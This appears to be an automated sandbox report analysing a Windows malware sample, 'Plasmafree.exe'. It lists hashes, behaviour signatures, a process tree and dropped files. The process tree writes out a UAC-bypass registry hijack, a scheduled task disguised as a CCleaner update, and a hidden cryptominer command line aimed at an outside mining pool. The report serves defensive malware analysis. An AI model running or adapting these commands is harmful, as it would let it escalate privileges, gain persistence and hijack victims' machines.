Analysis
-
max time kernel
630s -
max time network
625s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
31-05-2024 21:33
Static task
static1
General
-
Target
Plasmafree.exe
-
Size
16KB
-
MD5
40e2ed614058109b9b93a33cb8787277
-
SHA1
503260dd9d33f949613fceef68b6143d8049d913
-
SHA256
76397d748732f6ddf04130c19634808852d73711f6ee4d2829c171c2510cea7f
-
SHA512
cff8562ef36ba896e546add6f303999a2b09c263ab8b6cb2b9907e3d6835c0af0aa4575639d5e3a0690f77cc8061027465db9621d2a7ecdb8d4261def16a2d28
-
SSDEEP
384:Qd3kw7ShTvn9G7851TzZfvw1+zWsptYcFwVc03K:Q7ShTy85RlfvwkDtYcFwVc6K
Malware Config
Extracted
gozi
Signatures
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
runtimedotnet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fYBFndYoGcuiLjDLZw\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\fYBFndYoGcuiLjDLZw" runtimedotnet.exe -
Executes dropped EXE 10 IoCs
Processes:
runtimedotnet.exeVOLUMEID.exe05idezac.exeVOLUMEID.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exepid process 308 runtimedotnet.exe 3116 VOLUMEID.exe 4988 05idezac.exe 3128 VOLUMEID.exe 356 MNRk6q28sfoCKrqzM050MX.exe 4220 MNRk6q28sfoCKrqzM050MX.exe 3332 MNRk6q28sfoCKrqzM050MX.exe 3632 MNRk6q28sfoCKrqzM050MX.exe 2944 MNRk6q28sfoCKrqzM050MX.exe 2668 MNRk6q28sfoCKrqzM050MX.exe -
Loads dropped DLL 1 IoCs
Processes:
VOLUMEID.exepid process 3116 VOLUMEID.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
Processes:
flow ioc 37 discord.com 39 discord.com 43 discord.com 21 raw.githubusercontent.com 22 raw.githubusercontent.com 27 discord.com 28 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 checkip.amazonaws.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
MNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exeMNRk6q28sfoCKrqzM050MX.exepid process 356 MNRk6q28sfoCKrqzM050MX.exe 356 MNRk6q28sfoCKrqzM050MX.exe 4220 MNRk6q28sfoCKrqzM050MX.exe 4220 MNRk6q28sfoCKrqzM050MX.exe 3332 MNRk6q28sfoCKrqzM050MX.exe 3332 MNRk6q28sfoCKrqzM050MX.exe 3632 MNRk6q28sfoCKrqzM050MX.exe 3632 MNRk6q28sfoCKrqzM050MX.exe 2944 MNRk6q28sfoCKrqzM050MX.exe 2944 MNRk6q28sfoCKrqzM050MX.exe 2668 MNRk6q28sfoCKrqzM050MX.exe 2668 MNRk6q28sfoCKrqzM050MX.exe -
Drops file in Windows directory 3 IoCs
Processes:
Plasmafree.exedescription ioc process File created C:\Windows\Tasks\VOLUMEID.exe Plasmafree.exe File created C:\Windows\GameBarPresenceWriter\drive.sys Plasmafree.exe File created C:\Windows\GameBarPresenceWriter\runtimedotnet.exe Plasmafree.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 5000 taskkill.exe 5016 taskkill.exe -
Modifies registry class 8 IoCs
Processes:
reg.exereg.exeExplorer.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\quarterturkey168.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\ms-settings\shell\open reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
runtimedotnet.exeVOLUMEID.exe05idezac.exepid process 308 runtimedotnet.exe 308 runtimedotnet.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 4988 05idezac.exe 4988 05idezac.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe 3116 VOLUMEID.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3416 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
runtimedotnet.exepid process 308 runtimedotnet.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exePlasmafree.exetaskkill.exeruntimedotnet.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 1240 wmic.exe Token: SeSecurityPrivilege 1240 wmic.exe Token: SeTakeOwnershipPrivilege 1240 wmic.exe Token: SeLoadDriverPrivilege 1240 wmic.exe Token: SeSystemProfilePrivilege 1240 wmic.exe Token: SeSystemtimePrivilege 1240 wmic.exe Token: SeProfSingleProcessPrivilege 1240 wmic.exe Token: SeIncBasePriorityPrivilege 1240 wmic.exe Token: SeCreatePagefilePrivilege 1240 wmic.exe Token: SeBackupPrivilege 1240 wmic.exe Token: SeRestorePrivilege 1240 wmic.exe Token: SeShutdownPrivilege 1240 wmic.exe Token: SeDebugPrivilege 1240 wmic.exe Token: SeSystemEnvironmentPrivilege 1240 wmic.exe Token: SeRemoteShutdownPrivilege 1240 wmic.exe Token: SeUndockPrivilege 1240 wmic.exe Token: SeManageVolumePrivilege 1240 wmic.exe Token: 33 1240 wmic.exe Token: 34 1240 wmic.exe Token: 35 1240 wmic.exe Token: 36 1240 wmic.exe Token: SeIncreaseQuotaPrivilege 1240 wmic.exe Token: SeSecurityPrivilege 1240 wmic.exe Token: SeTakeOwnershipPrivilege 1240 wmic.exe Token: SeLoadDriverPrivilege 1240 wmic.exe Token: SeSystemProfilePrivilege 1240 wmic.exe Token: SeSystemtimePrivilege 1240 wmic.exe Token: SeProfSingleProcessPrivilege 1240 wmic.exe Token: SeIncBasePriorityPrivilege 1240 wmic.exe Token: SeCreatePagefilePrivilege 1240 wmic.exe Token: SeBackupPrivilege 1240 wmic.exe Token: SeRestorePrivilege 1240 wmic.exe Token: SeShutdownPrivilege 1240 wmic.exe Token: SeDebugPrivilege 1240 wmic.exe Token: SeSystemEnvironmentPrivilege 1240 wmic.exe Token: SeRemoteShutdownPrivilege 1240 wmic.exe Token: SeUndockPrivilege 1240 wmic.exe Token: SeManageVolumePrivilege 1240 wmic.exe Token: 33 1240 wmic.exe Token: 34 1240 wmic.exe Token: 35 1240 wmic.exe Token: 36 1240 wmic.exe Token: SeDebugPrivilege 3764 Plasmafree.exe Token: SeDebugPrivilege 5000 taskkill.exe Token: SeLoadDriverPrivilege 308 runtimedotnet.exe Token: SeIncreaseQuotaPrivilege 2720 wmic.exe Token: SeSecurityPrivilege 2720 wmic.exe Token: SeTakeOwnershipPrivilege 2720 wmic.exe Token: SeLoadDriverPrivilege 2720 wmic.exe Token: SeSystemProfilePrivilege 2720 wmic.exe Token: SeSystemtimePrivilege 2720 wmic.exe Token: SeProfSingleProcessPrivilege 2720 wmic.exe Token: SeIncBasePriorityPrivilege 2720 wmic.exe Token: SeCreatePagefilePrivilege 2720 wmic.exe Token: SeBackupPrivilege 2720 wmic.exe Token: SeRestorePrivilege 2720 wmic.exe Token: SeShutdownPrivilege 2720 wmic.exe Token: SeDebugPrivilege 2720 wmic.exe Token: SeSystemEnvironmentPrivilege 2720 wmic.exe Token: SeRemoteShutdownPrivilege 2720 wmic.exe Token: SeUndockPrivilege 2720 wmic.exe Token: SeManageVolumePrivilege 2720 wmic.exe Token: 33 2720 wmic.exe Token: 34 2720 wmic.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
Processes:
Explorer.EXEVOLUMEID.exepid process 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3416 Explorer.EXE 3116 VOLUMEID.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Plasmafree.execmd.execmd.execmd.exeVOLUMEID.exedescription pid process target process PID 3764 wrote to memory of 1240 3764 Plasmafree.exe wmic.exe PID 3764 wrote to memory of 1240 3764 Plasmafree.exe wmic.exe PID 3764 wrote to memory of 1240 3764 Plasmafree.exe wmic.exe PID 3764 wrote to memory of 4652 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4652 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4652 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4492 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4492 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4492 3764 Plasmafree.exe cmd.exe PID 4492 wrote to memory of 5000 4492 cmd.exe taskkill.exe PID 4492 wrote to memory of 5000 4492 cmd.exe taskkill.exe PID 4492 wrote to memory of 5000 4492 cmd.exe taskkill.exe PID 3764 wrote to memory of 308 3764 Plasmafree.exe runtimedotnet.exe PID 3764 wrote to memory of 308 3764 Plasmafree.exe runtimedotnet.exe PID 3764 wrote to memory of 4536 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4536 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4536 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4468 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4468 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 4468 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 2720 3764 Plasmafree.exe wmic.exe PID 3764 wrote to memory of 2720 3764 Plasmafree.exe wmic.exe PID 3764 wrote to memory of 2720 3764 Plasmafree.exe wmic.exe PID 4468 wrote to memory of 5016 4468 cmd.exe taskkill.exe PID 4468 wrote to memory of 5016 4468 cmd.exe taskkill.exe PID 4468 wrote to memory of 5016 4468 cmd.exe taskkill.exe PID 3764 wrote to memory of 5024 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 5024 3764 Plasmafree.exe cmd.exe PID 3764 wrote to memory of 5024 3764 Plasmafree.exe cmd.exe PID 5024 wrote to memory of 4668 5024 cmd.exe mode.com PID 5024 wrote to memory of 4668 5024 cmd.exe mode.com PID 5024 wrote to memory of 4668 5024 cmd.exe mode.com PID 5024 wrote to memory of 3636 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3636 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3636 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 872 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 872 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 872 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 1348 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 1348 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 1348 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2360 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2360 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2360 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 4556 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 4556 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 4556 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3408 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3408 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3408 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3456 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3456 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3456 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3532 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3532 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 3532 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2200 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2200 5024 cmd.exe WMIC.exe PID 5024 wrote to memory of 2200 5024 cmd.exe WMIC.exe PID 3116 wrote to memory of 2668 3116 VOLUMEID.exe reg.exe PID 3116 wrote to memory of 2668 3116 VOLUMEID.exe reg.exe PID 3116 wrote to memory of 2668 3116 VOLUMEID.exe reg.exe PID 3116 wrote to memory of 3928 3116 VOLUMEID.exe reg.exe PID 3116 wrote to memory of 3928 3116 VOLUMEID.exe reg.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\Plasmafree.exe"C:\Users\Admin\AppData\Local\Temp\Plasmafree.exe"2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\VOLUMEID.exe3⤵PID:4652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im VOLUMEID.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im VOLUMEID.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Windows\GameBarPresenceWriter\runtimedotnet.exe"C:\Windows\GameBarPresenceWriter\runtimedotnet.exe" C:\Windows\GameBarPresenceWriter\drive.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\VOLUMEID.exe3⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im VOLUMEID.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im VOLUMEID.exe4⤵
- Kills process with taskkill
PID:5016 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\plasmaserial.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\mode.commode con: cols=90 lines=484⤵PID:4668
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic bios get serialnumber4⤵PID:3636
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:872
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get serialnumber4⤵PID:1348
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get processorid4⤵PID:2360
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic diskdrive get serialnumber4⤵PID:4556
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic baseboard get serialnumber4⤵PID:3408
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic memorychip get serialnumber4⤵PID:3456
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_NetworkAdapter where "PNPDeviceID like '%PCI%' AND NetConnectionStatus=2 AND AdapterTypeID='0'" get MacAddress4⤵PID:3532
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID4⤵PID:2200
-
C:\Windows\Tasks\VOLUMEID.exe"C:\Windows\Tasks\VOLUMEID.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\quarterturkey168.vbs" /f3⤵
- Modifies registry class
PID:2668 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f3⤵
- Modifies registry class
PID:3928 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C computerdefaults.exe3⤵PID:1036
-
C:\Windows\SysWOW64\ComputerDefaults.execomputerdefaults.exe4⤵PID:696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN CCleanerUpdateTask_bubk6q28sfoCKrqzM050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Edge\bubk6q28sfoCKrqzM050MX.exe" /RL HIGHEST /IT3⤵PID:440
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC ONLOGON /TN CCleanerUpdateTask_bubk6q28sfoCKrqzM050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Edge\bubk6q28sfoCKrqzM050MX.exe" /RL HIGHEST /IT4⤵
- Creates scheduled task(s)
PID:2064 -
C:\Users\Admin\AppData\Local\Temp\05idezac.exe"C:\Users\Admin\AppData\Local\Temp\05idezac.exe" explorer.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4988 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig3⤵PID:1848
-
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:356 -
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 05⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig3⤵PID:2208
-
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3332 -
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 05⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C start /B /MIN C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig3⤵PID:2452
-
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2944 -
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeC:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exe -a kawpow -o stratum+tcp://rvn.kryptex.network:7777 -u RSWxribbWE9wiwGUm8VJ7A7TDuLkiCBbaD/LCRig -RUN -reboot-times 05⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2668 -
C:\Users\Admin\Downloads\VOLUMEID.exe"C:\Users\Admin\Downloads\VOLUMEID.exe"2⤵
- Executes dropped EXE
PID:3128
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1408
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\MNRk6q28sfoCKrqzM050MX.exeFilesize
11.4MB
MD5a7400236ffab02ae5af5c9a0f61e7300
SHA1e3a6e33cb751dd81f4f6a62405df2930e9ede400
SHA256bb3af0c03e6b0833fa268d98e5a8b19e78fb108a830b58b2ade50c57e9fc9bed
SHA51228bcef5cd4d01b8582a13538b893a96a1d86a07a9b91672f1602d3d5cc0806aaec00e9fa64b7852294dec3f0aa27045ba19d65869d4c4ba4bc3ce68ade8e5ebd
-
C:\Users\Admin\AppData\Local\Temp\05idezac.exeFilesize
124KB
MD5e898826598a138f86f2aa80c0830707a
SHA11e912a5671f7786cc077f83146a0484e5a78729c
SHA256df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA5126827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb
-
C:\Users\Admin\AppData\Local\Temp\4f74f52aefc645e6931adfcb2ebb1cceFilesize
136KB
MD56fe2c73cc7ec5510acb6480af96d6ec4
SHA141bacf8aa8e0effac4c9a7a066de2b5092e349a3
SHA256cf4131048930daa4351ca09f9c46ed829f05c87762569650a8c374c1b3ad8773
SHA512f558bdee86fe68986e81b53b6f72624ae11c90992daaabbf1e572357a7a8ba08b7dccd46d83cb4528efa5c9c529421ab3cad6f64e849c01391bf5380e28ad3fc
-
C:\Users\Admin\AppData\Roaming\Gongle\a24OXREXEU\wjyk7j4u.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteFilesize
48KB
MD5854a10c0922c27cfeffb77307ee80a71
SHA1bb8cbe8467bfc490031e29fb27fe50ec014f53e2
SHA256f696b1fa16384ecdec974e1bc9a8841fd50cb739818654dc3c7716821d52f69b
SHA512a5004751e3b89fdf4ce49492c46d09eca1a0177c57cacc6546deb236a17c747600748537687713516565330907a2541d3bba4b96cc3b106d589e38ef09b86162
-
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\LOGFilesize
329B
MD50190ee80d78a4e94abe1d1908a3a7ffe
SHA10a92361ec9c7912c555a43d49cb08ef2ec81dab5
SHA256fd31d41e012b325b39063bec362e0030703b0fc1d67eff11ab2e4e2a01fd27a8
SHA5129960e1528acadd2a572ed01b48d0f9a1142fd248565972ba2f368af2e3f95d1fe8b2d62511668b9fcd07bdeeafde64c5758de451fba6c6c3817876d1eae7b774
-
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\LOG.oldFilesize
291B
MD5b2df2290f73e0eac3e80d78eb1ef3602
SHA19c079ec457fa774394508671948bf4147b9644b6
SHA256838554e15d2145dd1fc86d1fd4e91a263e859a02a199688f8509f6d73b38f652
SHA512791706e08f6171fa7a13a8bb70ae835dd1041e8f4cc72fe7ee2d081771222ef950dab0e17887ea88ba97ac73fca0b02f74cadda27e210b9c2b1877d8b542961d
-
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Windows\GameBarPresenceWriter\runtimedotnet.exeFilesize
141KB
MD54b9dc0373a13ef476985f74bc69c45b5
SHA13c0838e27f2c13e5ee4580303fa1a314ed8678ba
SHA256821691e0305db7d5868f4ac5bd7b2c16253b23054ac75783d1ca75835680c17f
SHA512bf6ac16fef0262e94350d04b3454df7f30bed8cd55a5f0aafae6c9a14caf0db40f4b97a1adb700de42824237adf8540258e69aa9e0cc90acbc5d3606bbf4f6d5
-
C:\Windows\Tasks\VOLUMEID.exeFilesize
12KB
MD5daa5d2f83152707d674bae2eb7238767
SHA1503bc6538b0334f3548328d299bc7f95d08f7840
SHA256768c586ee4e1172190dfd0f6b3185b79dd2f72e332ef1c22faa702548d8b579e
SHA512d71146f7f0d5b016f4ae1ae32dbc1db6a4702360c942c923cdeb416edc82709b607c98798449f660b65818be7c79e8108095212f2173bed7615681650a137502
-
C:\plasmaserial.batFilesize
855B
MD5ab84096b01cdcc304e442659c12edfc3
SHA1f42281b6ab6e7373307091381a300bc659076ecc
